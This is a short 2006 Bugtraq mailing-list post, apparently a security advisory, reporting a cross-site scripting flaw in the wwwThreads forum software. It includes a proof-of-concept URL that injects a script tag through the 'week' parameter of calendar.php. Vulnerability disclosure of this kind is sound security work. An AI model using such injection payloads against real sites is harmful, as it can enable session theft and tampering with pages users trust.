
Date: 25 Jul 2006 22:22:54 -0000
From: l2odon@...oo.com
To: bugtraq@...urityfocus.com
Subject: wwwThreads XSS

#----------------------------------------------------------                   
#Aria-Security.net Advisory
#Discovered  by: l2odon
#< www.Aria-security.net>
#Gr33t to: A.u.r.a  & O.U.T.L.A.W & R@...N @ DrtRp & Cl0wn 
#-----------------------------------------------------------
#Software: wwwThreads
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/wwwthreads.txt
#
#
#
#Proof of Concept:
#
#http://www.site.com/[path]/calendar.php?week="><script>alert('test!')</script><
#
#----------------------------------------------------------                   
#
#Solution
#contact me: Advisory@...a-Security.net
#
#----------------------------------------------------------                   

